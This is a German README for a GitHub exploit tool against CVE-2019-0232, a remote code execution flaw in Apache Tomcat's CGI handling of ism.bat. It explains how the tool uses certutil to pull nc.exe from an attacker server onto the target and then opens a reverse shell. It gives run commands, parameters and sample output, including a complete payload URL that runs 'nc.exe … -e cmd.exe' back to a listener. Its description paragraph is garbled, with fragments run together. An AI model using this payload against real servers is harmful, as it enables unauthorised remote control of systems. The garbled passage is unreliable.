
Hallo, dies ist ein überarbeiteter und verbesserter Code für CVE-2019-0232
Dieses Skript nutzt die Sicherheitslücke CVE-2019-0232 in Apache Tomcat aus, die durch die unsachgemäße Handhabung des Skripts ism.bat eine Remote-Codeausführung ermöglicht. Das Skript verwendet eine Reverse-Shell-Technik mit certutil und nc.exe (Netcat), um Remote-Zugriff auf das verwundbare System zu erlangen.
ism.bat durch Apache Tomcat, die es Angreifern ermöglichen könnte, beliebige Befehle auf dem Server auszuführen. Diese Schwachstelle tritt aufgrund fehlender ordnungsgemäßer Validierung von Benutzereingaben auf, sodass Angreifer durch eine speziell gestaltete Anfrage die Ausführung beliebiger Befehle auslösen können.nc.exe-Datei von einem entfernten Server herunterzuladen und damit eine Reverse-Shell zu starten.nc.exe) muss auf einem Server für die Reverse-Shell-Verbindung gehostet werden.nc.exe: Das Skript sendet eine präparierte Anfrage an den verwundbaren Tomcat-Server, um die Datei nc.exe (Netcat) mithilfe von certutil auf das Zielsystem herunterzuladen.nc.exe heruntergeladen wurde, wird eine weitere Anfrage gesendet, um den Reverse-Shell-Befehl auszuführen, der zurück zum Netcat-Listener des Angreifers verbindet.git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232
python3 exploit.py
Target Host: The IP address of the Apache Tomcat server to exploit.
Target Port: The port of the target server (default: 8080).
Server IP: The IP address of the server hosting nc.exe.
Server Port: The port number where nc.exe is hosted (default: 80).
Netcat Listener IP: Your IP address that will receive the reverse shell.
Netcat Listener Port: The port on which you are listening for the reverse shell.
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe
Nach erfolgreicher Ausführung sollten Sie eine Reverse-Shell-Verbindung zu Ihrem Netcat-Listener haben.
Dieses Skript ist ausschließlich für Bildungszwecke bestimmt. Verwenden Sie es nicht für böswillige Aktivitäten. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie Penetrationstests oder Sicherheitsaudits durchführen. Missbrauch dieses Skripts kann rechtliche Konsequenzen haben.
Autor: A!Z3N(Dharan) Erstellt mit Power!
Dieses Projekt ist unter der MIT-Lizenz lizenziert.
Allerdings: Nutzung auf eigene Gefahr. Dieser Code wird ausschließlich zu Bildungszwecken bereitgestellt. Durch die Nutzung dieses Codes erklären Sie sich damit einverstanden, die volle Verantwortung für alle Handlungen zu übernehmen, die sich aus seiner Nutzung ergeben. Missbrauch oder unbefugte Nutzung dieses Exploits kann zu rechtlichen Konsequenzen führen. Holen Sie stets eine entsprechende Genehmigung ein, bevor Sie Sicherheitstests oder Penetrationstests an einem System durchführen.
Sie sind frei, diesen Code zu verwenden, zu modifizieren und zu verbreiten, jedoch nur für ethische Zwecke. Der Autor übernimmt keine Haftung für Schäden, die durch diesen Code verursacht werden.
Verwenden Sie diesen Exploit nicht ohne die ausdrückliche Genehmigung des Eigentümers des Zielsystems.